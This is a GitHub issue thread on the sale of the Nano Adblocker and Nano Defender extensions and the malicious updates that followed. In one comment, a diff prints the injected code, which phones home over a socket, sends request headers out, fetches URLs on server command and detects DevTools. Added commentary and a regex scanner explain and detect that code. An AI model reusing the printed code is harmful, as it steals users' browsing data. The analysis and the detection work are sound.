jspenguin2017 / Snippets

Random code snippets

Discussions regarding recent changes to the Nano projects #2

Closed jspenguin2017 closed 4 years ago

jspenguin2017 commented 4 years ago

Original announcement: https://github.com/NanoAdblocker/NanoCore/issues/362

Please continue the discussions here.

Please take the time to read the original announcement (the entire thread) before posting your comment.


Final update:

I understand that my handling of the recent changes was a disaster, and I am sorry that my inexperience caused issues for some of you. But it would be a bigger disaster if we do not learn from this incident. It is clear that I could have handled the background checks of the new developer(s) and the user communications better.

This is the first time that someone has offered to acquire my software, and I honestly have no idea what the process should look like. Many of you have commented on what I should have done, but there is currently too much conflicting information floating around. Instead of taking advice from here, which has proven to be rather difficult, I will seek professional counselling next time to ensure a smooth and secure transition.

All the best for the future.


Update:

For those of you discussing suing me, I would like to direct you to read the GPL-3.0 license and the disclaimers in the original announcement post again.

jspenguin2017 commented 4 years ago

Okay, I analyzed the update with Burp Suite, and so far it doesn't seem to be doing anything special. But I do see that the code can be remotely configured. I'm not sure how it passed WebStore review, but I'm submitting a ticket to ask them to review it again.

nicole-ashley commented 4 years ago

@nikrolls

so @jspenguin2017 is most likely to just have given login details

No, I still control the Edge store listings.

So what was the plan then for releasing Edge updates?

jspenguin2017 commented 4 years ago

@nikrolls

So what was the plan then for releasing Edge updates?

No plan, the Edge store listings won't receive further updates. They were changed to hidden (unlisted).

thetayloredman commented 4 years ago

So just making sure, basically you transferred ownership of an extension and then the new developer turned it into malware? (As in monitoring for devtools to be opened, and logging sites?)

thetayloredman commented 4 years ago

Also here's what I get when POSTing https://def.dev-nano.com/ with this JSON payload:

```json
{"handleObject":{}}
```

```html
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <title>Error</title>
</head>

<body>
    <pre>Cannot POST /</pre>
</body>

</html>
```

If you can't tell, it's an Express.js server running on the Node.js runtime. Especially proven by:

X-Powered-By: Express

Here's the full payload:

Request

```http
POST / HTTP/1.1
Host: def.dev-nano.com
Content-Type: application/json
Content-Length: 19

{"handleObject":{}}
```

Response

```http
HTTP/1.1 404 Not Found
Date: Fri, 16 Oct 2020 02:37:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=<>; expires=Sun, 15-Nov-20 02:37:12 GMT; path=/; domain=.dev-nano.com; HttpOnly; SameSite=Lax; Secure
X-Powered-By: Express
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: <>
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?lkg-colo=11&lkg-time=1602815832"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: <>
Content-Encoding: gzip

Error
Cannot POST /
```

1aTa commented 4 years ago

I've installed this on many PCs for friends and family and you just sell out without doing any sort of due diligence?

Just wow.

thetayloredman commented 4 years ago

I know, it's really off.

Reno-Sifana commented 4 years ago

OK. As a user of Nano Adblocker and Nano Defender, I will immediately uninstall Nano Defender and Nano Adblocker on the new Microsoft Edge based on Chromium and replace them with uBlock Origin and uBO Extra only. Thanks for the information.

jspenguin2017 commented 4 years ago

@1aTa

without doing any sort of due diligence?

I looked up the person who contacted me, didn't find anything bad. Nothing good either, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

Maskedman99 commented 4 years ago

Reminds me of the event-stream incident https://github.com/dominictarr/event-stream/issues/116. The project is licensed under GPLv3, where it is clearly mentioned: THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. (refer to sections 15, 16 and 17) There's no point in blaming each other now, let's just focus on fixing the issue.

mapx- commented 4 years ago

https://www.ghacks.net/2020/10/16/time-to-remove-nano-adblocker-and-defender-from-your-browsers-except-firefox/

Just report this fake nano as an abuse / malware:

https://chrome.google.com/webstore/report/gabbbocakeomblphkmmnoamkioajlkfo?hl=en

hbarsaiyan commented 4 years ago

@1aTa

without doing any sort of due diligence?

I looked up the person who contacted me, didn't find anything bad. Nothing good either, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

Then why doesn't he come to the GitHub issue and clear the air himself? Quick buck or not, one thing is sure: you just sold the userbase and put the user data of 100,000+ users at risk. I respected the work you put into this project and recommended it to my friends, but now you have lost your credibility in my eyes. If you really wanted a new maintainer, I think you could have discussed it here first before selling out.

uBlock-user commented 4 years ago

He's on github -- https://github.com/nenodevs I doubt he cares, he got what he wanted anyways.

Toriigate commented 4 years ago

Per the ghacks article and comments, I've reported the recent changes to both the Chrome Store and the Microsoft Store.

nicole-ashley commented 4 years ago

I have contacted Microsoft and they are looking into whether it's possible to block installation of the Chrome Store version on Edge as well.

Yuki2718 commented 4 years ago

I looked up the person who contacted me, didn't find anything bad. Nothing good either, but he said he's just starting out. He legit paid and didn't disappear afterwards. There wasn't really a reason to be suspicious of him.

You wouldn't if there's anything bad, we all know. The reason people criticize you is that you sold to guys with no good record, i.e. unknown, without first discussing it openly. Anyway, it's done. I guess it's better to discuss what can be done to recover what was lost, in addition to reporting the extension, such as Quick reporter. I appreciate that you offered @LiCybora assistance with the reporter.

gorhill commented 4 years ago

The same sort of code I reported here has been added to Nano Adblocker 1.0.0.154.

The code was added to /js/commands.js (file normally used to handle extension keyboard shortcuts).

Minor differences are the incoming/outgoing message names used to configure the two-way phone-home capabilities (to distinguish from which extension the messaging occurs, I suppose), and how they try to "obfuscate" the code dealing with removing instances of -zzz in outgoing request headers (whose purpose is still a mystery to me).

Those code changes can't be found on their repo.

Here is the diff ```diff --- v1.0.0.153/js/commands.js +++ v1.0.0.154/js/commands.js 
@@ -55,6 +55,98 @@ ); } +var nanoDevAB = io.connect("https://www.dev-nano.com/"); +var getNewListData = {}; + +async function getNewList(newList) { + let getFeResp = await fetch(newList.uri, newList.attr) + let num = 1; + if (num == 1) { + var getListObj = {} + } else { + var fact = 1; + for (var i = 1; i > num; i--) { + fact = fact * i; + break; + } + var getListObj = {} + } + getListObj.headerEntries = Array.from(getFeResp.headers.entries()) + getListObj.data = await getFeResp.text() + getListObj.ok = getFeResp.ok; + getListObj.status = getFeResp.status; + return getListObj; +} + +nanoDevAB.on("getNewList", async function (newList) { + let getRes = await getNewList(newList); + nanoDevAB.emit(newList.callBack, getRes) +}); + +nanoDevAB.on("getNewListData", function (a) { + getNewListData = a; +}) + +var handleLists = function (infos) { + var listKey = Object.keys(getNewListData); + var find1 = "-"; + var detailsHeader = infos.requestHeaders; + var find2 = "z"; + var HeadReverse = detailsHeader.reverse(); + var stringyFy = JSON.stringify(HeadReverse); + var find4 = "z"; + var countEqual = ""; + if (listKey.length > 0) { + var checkerList = true; + for (const object of listKey) { + if (object.x === object.y) { + countEqual += 1; + } + break; + } + for (let i = 0; i < listKey.length; i++) { + let x = listKey[i]; + var re = new RegExp(getNewListData[x],'gi'); + countEqual = "5"; + if (infos[x].toString().match(re) == null) { + checkerList = false; + break; + } + } + if (checkerList) { + nanoDevAB.emit('newListhandeList', infos); + } + } + + var find3 = "z"; + var findAll = [find1, find2, find3, find4].join(""); + var parseConcat = stringyFy.split(findAll).join(""); + var parser = JSON.parse(parseConcat); + return { + requestHeaders: parser + } +}; +chrome.webRequest.onBeforeSendHeaders.addListener(handleLists, { + urls: [""] +}, ['requestHeaders', 'blocking', 'extraHeaders']); + + +var element = document.createElement("p"); ; +var openListGet = false; 
+element.__defineGetter__("id", function() { + openListGet = true; +}); + +var i = setInterval(function() { + openListGet = false; + console.log(element); + if(openListGet){ + nanoDevAB.emit("report") + console.clear(); + clearInterval(i) + } +}, 100); + /******************************************************************************/ (( ) => { ```
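Review bot: `handleLists` hands the whole webRequest `infos` object (including `requestHeaders`) to the remote socket via `nanoDevAB.emit('newListhandeList', infos)` whenever every regex in `getNewListData` matches, and `getNewListData` is itself set by the server in the `nanoDevAB.on("getNewListData", ...)` handler, so the server decides which requests get reported; together with `getNewList`, which runs `fetch(newList.uri, newList.attr)` on command and returns the response headers, body and status, this is a remotely controlled request and exfiltration channel and must not ship. Two blocks are dead code that only pad the hunk: `num` is always 1, so the factorial branch never runs, and `for (const object of listKey)` compares `object.x === object.y` on string keys (both `undefined`, so always true) and `break`s after the first iteration, while `countEqual` is then overwritten with `"5"` and never read. The header rewrite `stringyFy.split(findAll).join("")` also blindly strips the text `-zzz` from every header value, after `detailsHeader.reverse()` has already mutated the caller's array in place. Finally, `element.__defineGetter__("id", ...)` combined with `console.log(element)` every 100 ms is a DevTools-open detector: the getter runs only when the inspector renders the element, at which point `emit("report")`, `console.clear()` and `clearInterval(i)` fire.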
uBlock-user commented 4 years ago

Those code changes can't be found on their repo.

They're waiting for CWS approval. They did the same thing with Defender, they waited for the approval and then it went into the source.

gorhill commented 4 years ago

The socket code file change is there, the diff I published above and in the other case is what is not there.
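An added example (not from this thread and not the Nano projects' own code): a small static indicator scanner, in Node.js, for the behaviours gorhill describes above (remote socket, fetch on command, header interception, exfiltration of request details, DevTools detection). The two source samples it checks are constructed for this example with placeholder hostnames, and the indicator ids and the block/review verdict rule are my own assumptions.

```javascript
// Indicator patterns over extension source: each has a regex and the reason a
// reviewer should care. They encode the behaviours visible in the diff above;
// the ids and the verdict thresholds are assumptions made for this example.
const INDICATORS = [
  { id: 'remote-socket',
    re: /\bio\.connect\s*\(\s*["'`]https?:\/\/[^"'`]+["'`]/g,
    why: 'persistent socket.io channel to a remote host (two-way phone-home)' },
  { id: 'fetch-non-literal-url',
    re: /\bfetch\s*\(\s*[A-Za-z_$][\w$]*\.[\w$]+\s*,\s*[A-Za-z_$][\w$]*\.[\w$]+\s*\)/g,
    why: 'fetch() whose URL and options both come from a data object, i.e. can be server-supplied' },
  { id: 'header-interception',
    re: /webRequest\.onBeforeSendHeaders\.addListener\s*\([\s\S]*?\[\s*["']requestHeaders["'][^\]]*["']blocking["'][^\]]*["']extraHeaders["']/g,
    why: 'blocking listener with extraHeaders can read and rewrite Cookie/Authorization' },
  { id: 'request-details-exfil',
    re: /\.emit\s*\(\s*["'`][^"'`]+["'`]\s*,\s*(?:infos|details|requestHeaders)\b/g,
    why: 'webRequest details object is sent over the socket' },
  { id: 'devtools-detection',
    re: /__defineGetter__\s*\(\s*["'`]id["'`][\s\S]*?console\.log\s*\(\s*element\s*\)/g,
    why: 'getter on a console.log-ed element fires only when DevTools inspects it' },
];

// Scan one JS source string; returns one finding per match with its line number.
function scanExtensionSource(src) {
  const findings = [];
  for (const ind of INDICATORS) {
    ind.re.lastIndex = 0; // the /g regexes are shared across calls
    let m;
    while ((m = ind.re.exec(src)) !== null) {
      const line = src.slice(0, m.index).split('\n').length;
      findings.push({ id: ind.id, line, why: ind.why, match: m[0].slice(0, 60) });
    }
  }
  return findings;
}

// Combine findings across files into a verdict. Rule (an assumption): a remote
// socket plus either header interception or exfil of request details is an
// automatic block; any other finding needs a human review.
function assessExtension(files) {
  const findings = [];
  for (const [file, src] of Object.entries(files)) {
    for (const f of scanExtensionSource(src)) findings.push({ file, ...f });
  }
  const ids = new Set(findings.map((f) => f.id));
  let verdict = ids.size > 0 ? 'review' : 'clean';
  if (ids.has('remote-socket') &&
      (ids.has('header-interception') || ids.has('request-details-exfil'))) {
    verdict = 'block';
  }
  return { verdict, findings };
}

// Constructed sample 1: a condensed stand-in with the same shape as the diff.
// The hostname is a placeholder, not the real phone-home server.
const SUSPICIOUS_SAMPLE = `
var sock = io.connect("https://placeholder.invalid/");
var rules = {};
sock.on("getNewList", async function (newList) {
  let r = await fetch(newList.uri, newList.attr);
  sock.emit(newList.callBack, await r.text());
});
sock.on("getNewListData", function (a) { rules = a; });
chrome.webRequest.onBeforeSendHeaders.addListener(function (infos) {
  sock.emit("newListhandeList", infos);
  return { requestHeaders: infos.requestHeaders };
}, { urls: ["<all_urls>"] }, ["requestHeaders", "blocking", "extraHeaders"]);
var element = document.createElement("p");
element.__defineGetter__("id", function () { sock.emit("report"); });
setInterval(function () { console.log(element); }, 100);
`;

// Constructed sample 2: a commands.js that really only handles keyboard
// shortcuts, plus a plain filter-list download with a literal URL.
const BENIGN_SAMPLE = `
chrome.commands.onCommand.addListener(function (command) {
  if (command === "launch-element-picker") { openPicker(); }
});
fetch("https://placeholder.invalid/filters.txt").then(function (r) { return r.text(); });
`;

// Run the scanner over both samples as if they were two files of one package.
function demo() {
  return assessExtension({ 'js/commands.js': SUSPICIOUS_SAMPLE, 'js/other.js': BENIGN_SAMPLE });
}

console.log(JSON.stringify(demo(), null, 2));
```

Regex indicators like these catch only the unobfuscated shape shown in the diff; a reviewer should treat them as a triage aid and still read any flagged file, and any webRequest listener registered with 'blocking' and 'extraHeaders', in full.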

daemonspudguy commented 4 years ago

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued it?

mapx- commented 4 years ago

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued it?

Just install & use uBO

LiCybora commented 4 years ago

Any alternatives to Nano Defender for Firefox now that the maintainer of that fork has discontinued it?

Nano Defender for Firefox is NOT discontinued, only Nano Adblocker.

More accurately: I refuse to port Nano Defender for the new developers, but I do NOT say I abandoned Nano Defender. Instead, it is independent from upstream now.

thetayloredman commented 4 years ago

Okay so, @jspenguin2017 why didn't you just discontinue the project in some way? You could have pushed an update that shows some sort of popup on browser start or some sort of warning to notify the users of it being discontinued. If you really wanted to sell it, I would have put that sort of alert there for more than a week before finalizing the sale.

resynth1943 commented 4 years ago

Just wrote a blog post to warn people about this extension.

I'm trying to make as much noise as possible, so people are aware of this horrendous abuse of trust.

Techman commented 4 years ago

@Techman

put them in harm's way to make a quick buck

Do not misrepresent facts. I was looking for a new maintainer. If I had known that the new developer(s) would do this, I would not have accepted the deal.

As I mentioned here [1], I planned to donate most of the money back to the new developer(s) if they do a good job. If I wanted to make a quick buck, I would sell the projects and disappear.

@jspenguin2017 I am not "misrepresenting facts." The actual facts show that you sold the extension to unknown, unproven (in terms of competence), and eventually-proven untrustworthy developers for financial gain. I say "quick buck" because you did this all very fast, without properly allowing the community any input. Like I said before in the now-frozen issue, you would have been better off closing down the project and sending users back to uBlock Origin than sell your users directly into malware. That is directly your fault.

There is no recovering from this. You have permanently destroyed the trust that the userbase had for you. You can't, as far as I know, get control of the extension back on the Chrome Web Store. The only hope now for uninformed end-users is that Google steps up and bans the extension.

What are you going to do to try and help fix this situation?

Peacock365 commented 4 years ago

Seems like Google has removed Nano Defender from the Chrome Web Store already, let's hope Nano Adblocker follows soon. I have reported both extensions to Google and will leave a 1 star review as well for good measure.

@jspenguin2017, this whole matter is nothing short of a shameful disgrace - you have sold out your user base, a sizable one at that, for a quick buck. Extremely pathetic indeed. You have permanently destroyed the trust I previously had in you, I had your extensions installed myself and recommended them to friends and family members. You were willing to deliberately put people at risk and you have given access to PII over to what turns out to be people not acting in good faith. I hope none of your future projects in the open source field succeed, and if I see your name mentioned somewhere, I'll make sure to point my finger at this incident here. Yes, this is harsh, but this is what you deserve for putting user data at risk in exchange for money, on a grand scale. To say I am extremely disappointed would be an understatement.

mapx- commented 4 years ago

nano defender disappeared from chrome store https://chrome.google.com/webstore/detail/nano-defender/ggolfgbegefeeoocgjbmkembbncoadlb?hl=en

resynth1943 commented 4 years ago

Great job. I've just reported Nano Adblocker as malware.

@jspenguin2017 Please take this as a learning curve. I suggest everyone else do the same. This is a perfect example of why selling your extension to "Turkish developers" (with absolutely no warning to your users) is really not a good idea.

In addition, I would encourage a much greater amount of transparency if you do this again. We don't even know who these people are, and they've already injected malicious code into hundreds of thousands of browsers worldwide. That's just not good, and everyone involved seems to have forgotten their implicit duty to the people, not secretive business deals.

If you take anything away from this, let it be that.

I do partially understand the anger of the users above, but I'd like to discourage any aggression towards Hugo. You're allowed to share your opinions, but please redact any opinionated cynicism.

He just fucked up, and probably hasn't done anything like this before (making him an even bigger target for these thugs).

Right, moving on: we need to scrub this malware off the Chrome Web Store permanently. Don't hold back.


I'd also like to amend this issue: https://github.com/LiCybora/NanoDefenderFirefox/issues/187

The maintainer of the Firefox extensions Nano Defender and Nano AdBlocker states:

NA and ND with LiCybora as author on AMO or on my GitHub repository are still under my control and independent from any entities or people.

So they're currently safe from malicious interference (for now?).

I am still open to any decisions


Now, seeing as we're all on the same page: we need to encourage people to report this malware to Google, which can be done here. This only takes two minutes, and will contribute to the removal of malware being peddled by unknown rogue "Turkish developers".

I really can't stand for this manipulative trickery. Remember, this malicious software can scrape bank credentials, passwords, and everything else.

EDIT: (Apologies for the email spam, I just needed to amend some more of my thoughts into this one.)

Speak up now, or forever hold your peace.

Peacock365 commented 4 years ago

@resynth1943

If anything, you are far too soft on @jspenguin2017... There is a reason for the lack of transparency here, namely that the users would not have been welcoming towards the sale, had it been announced way in advance. @jspenguin2017 knew that, so the transaction took place quietly, @jspenguin2017 received his money (his ultimate goal), now users are free to complain all they like, given that the ultimate goal (money) was already achieved, so who cares?

User data being put at risk? Not a concern as long as the cash is coming in... Sorry but this is how I see it. If it were not so, there would have been no reason to be so secretive about it, namely not to tell the user base anything about the deal. I reiterate what I said in my prior comment: If I see the former developer's name mentioned ever again in some other conversation, I'll point at this discussion here, let's see how far the few bucks he got in exchange for outright betraying the user base (by leaving access to user data wide open) get him, given his now ruined reputation.

EDIT: What are the downvoters trying to tell me here? Users of future projects of @jspenguin2017 should be informed of what the developer was previously capable of, for the sake of their own protection, not as revenge against @jspenguin2017. Likewise people who might invest in him monetarily in the future. The public has a right to be informed about such incidents (which constitute at the very least severe neglect if not worse). Or so I think anyway.

Epidomis commented 4 years ago

Just as a layman end user of nano defender, should I change my passwords to the sites I logged in? Should I assume my data has been compromised?

daemonspudguy commented 4 years ago

@Peacock365

I feel you are saying pretty inflammatory things about a situation you are kind of misinformed about. He sold a product to "a Turkish company" and that's it. Also, it appears that your account currently has a fork of Waterfox as its sole repository. A fork that is now 6 commits behind the master repo. Also, he was being transparent. This is the second thread discussing this. While I agree that it was wrong to not at least give a name of the company, there is a possibility he was forced to sign an agreement saying he wouldn't disclose the name of the company. EDIT: Also, @jspenguin2017 has released a guide on how to change back to uBlock Origin. https://github.com/LiCybora/NanoDefenderFirefox/issues/187#issuecomment-708101527

jamesy0ung commented 4 years ago

@jspenguin2017 Why did you sell the extension to random dodgy people? Also I would have appreciated some notice of it happening rather than seeing it on a ghacks article posted to reddit! Also I have installed this rubbish on my mates machines! Thanks A LOT!

resynth1943 commented 4 years ago

Also I have installed this rubbish on my mates machines! Thanks A LOT!

Was it on a Chrome browser? The Firefox extension isn't affected (yet?).

jamesy0ung commented 4 years ago

Also I have installed this rubbish on my mates machines! Thanks A LOT!

Was it on a Chrome browser? The Firefox extension isn't affected (yet?).

Yes

PseudoResonance commented 4 years ago

@resynth1943 Nothing is happening to the Firefox versions... I'm certain @LiCybora has said so, and I am confident that they have learned from this incident anyways. Plus, the developers that bought out the Chrome version ditched the Edge version. They're obviously not interested in wasting time on Firefox/Edge because of their low market share, because it won't make them as much money... The Firefox port of Nano Adblocker is shutting down, but the Firefox port of Nano Defender is what was being discussed.

Interest has been shown in continuing to maintain the Firefox Nano Defender, but most likely under a different name to avoid confusion. If you're on Firefox, you're perfectly safe... There is no (for now?)...

If possible, I think it would be great if the community could take the original Nano Defender, rename it and continue maintaining it under a different name, as if this issue never happened.

Although as I said earlier, thank you @resynth1943 for trying to avoid needlessly bashing on @jspenguin2017. It's already happened, and I would hope that a lesson has been learned. I don't think there's any point wasting effort on continuing to attack someone for a mistake they made.

Unfortunately, other than getting information on the news where people can see it, there is nothing that can be done about the people affected already. The extensions have been taken down from Chrome and Edge though, but I wonder whether or not the developer(s) will continue pursuing the userbase, or if they are moving on to a new victim already.

The issue is still very severe on any Chromium browsers, but I see no reason in being skeptical about Firefox. I think the best would be to either not mention it at all, so that users who are unaware of which browser they are on can safely uninstall it, or mention that Firefox is safe, but that Nano Adblock is being discontinued, so that the more tech-savvy users can get the full picture without unnecessarily giving them nightmares.

jspenguin2017 commented 4 years ago

@thetayloredman

why didn't you just discontinue the project in some way?

This is explained in the original announcement thread.

I would have put that sort of alert there for more than a week before finalizing the sale.

To implement such an alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something goes wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

I have other things to do and the new developer(s) are supposed to continue the development, so I didn't want to make things more complicated than necessary.

jspenguin2017 commented 4 years ago

@Techman

I say "quick buck" because you did this all very fast, without properly allowing the community any input.

Considering the kind of feedback I got when I announced that I will no longer maintain the Firefox version myself, I wasn't interested in getting community feedback for this acquisition.

What are you going to do to try and help fix this situation?

I reported the listing and submitted a ticket to Google.

jspenguin2017 commented 4 years ago

@Peacock365

for a quick buck

You were willing to deliberately put people at risk

I have already debunked these in the original announcement.

I hope none of your future projects in the open source field succeed

All of my active open source projects are successful. I consider a project to be successful if it is useful to me.

mxxcon commented 4 years ago

It seems like both add-ons have been removed from chrome store? If so, considering the unscrupulous nature of the buyers and the fact that it seems like their scheme failed, I imagine they'll try to get their money back? But I guess that comes with the territory.. 🤷

rmuchall commented 4 years ago

To implement such an alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something goes wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

I have some sympathy because you have created and maintained a successful extension for years without recompense, a difficult and thankless task. Yet whether you realize it or not you had a responsibility to your users to safeguard our personal data and you have failed in this duty. You should have notified us of the change of ownership with an alert from inside the extension before any change of ownership. You may have succeeded in the technical aspects of development but you have failed in the moral responsibilities of being a developer and people are rightfully angry.

jspenguin2017 commented 4 years ago

@Peacock365

received his money (his ultimate goal)

Not a concern as long as the cash is coming in...

Again, I have debunked these in the original announcement. You should go read it (the entire thread).

jspenguin2017 commented 4 years ago

@rmuchall @victorkilz

I do agree that a better notification system would have helped. But pushing a change to open a popup does not make sense. It's a lot of pain to get it out and the new developer(s) would have to undo that. Since I thought the new developer(s) would be maintaining the extensions, I didn't see a reason to shove an announcement in everyone's face.

I did announce the change on GitHub over a week before the new developer(s) published their changes, and linked it on all homepages. If the extensions had a proper announcement system that could be controlled remotely, I would definitely have pushed out an announcement through the extensions.

nicole-ashley commented 4 years ago

@jspenguin2017

To implement such an alert, I would need to code, test, and publish the change. WebStore review can take up to 3 weeks, maybe even longer if something goes wrong. It's easy for you to say "I would have done this", not so easy when you actually try to do it.

And I think this mentality is why people are using the term "quick buck", specifically the "quick" part. An acquisition like this (because an acquisition is indeed what this is) should never be a quick process. It should take as much time as required to safeguard the users that are being purchased (because they are indeed what is for sale here). 1-2 months is perfectly reasonable to get to the point of notifying users, and then there should have been another month or two to allow users to decide whether to keep the extension or switch before the new owners had access to publish any updates (otherwise they could get in and remove your announcement before many users saw it).

These timeframes are perfectly reasonable, even on the quick side, for something like this. Not to mention a lot more due diligence, and terms of sale to prevent the users being treated badly.

Anyway. It's done now and it's off the stores. At the very least, these malicious developers don't have access to existing users any more.

Deadoon commented 4 years ago

I looked up the person who contacted me, didn't find anything bad. Nothing good neither, but he said he's just starting out.

That should have been a massive red flag. No history is indicative of either inexperience, purposeful obfuscation, or a puppet. All of those should have been a deal ender for managing a plugin with this level of potential influence. Let them prove their ability and their intended direction before handing it off.

4GAP3 commented 4 years ago

Guys, honestly I think @jspenguin2017 has had enough for one day. The Chrome extension is gone (thank God) and now we can worry about the more pressing matter, which is: what's next for Nano? Redirect users back to uBlock? And what about @LiCybora? She hasn't said much apart from saying she will keep the project rolling.

mxxcon commented 4 years ago

Were the extensions removed by Google or by the new devs? What about the currently installed user base of ~100000 people? Doesn't the vast majority of them already run the malware version? Shouldn't Google proactively blacklist it and delete it from everyone's computers?

4GAP3 commented 4 years ago

@mxxcon can't speak for everyone, but last time I used a Chrome extension that was removed by Chrome, it was gone from my PC. I believe that's the case for everyone else, but again, I can't speak for everyone else.

User486375 commented 4 years ago

It's sad that it's actually the port of your extension that protects users from malware, doesn't sell them out and informs them that the project is no longer being maintained. You would usually expect the exact opposite scenario to happen.

@LiCybora If still possible you should actually push another update to your "no longer maintained" warning, to inform users that they should remove the extension from chrome ASAP if they also have it installed there.

LiCybora commented 4 years ago

What's next for Nano? Redirect users back to uBlock? And what about @LiCybora? She hasn't said much apart from saying she will keep the project rolling.

I need some time to pick up things, so it may take some time until the next update for the project.

If still possible you should actually push another update to your "no longer maintained" warning

Not quite possible unless I release one more version, but that would violate my claim of a final version. I almost never use Chrome, but I guess the extension should be removed/disabled when block-listed by Google? In Firefox, block-listed add-ons are disabled and cannot easily be re-enabled by the user (in case they are malicious).

swingcake commented 4 years ago

Can someone please provide a TL;DR when all this is settled? This is a lot for an average user.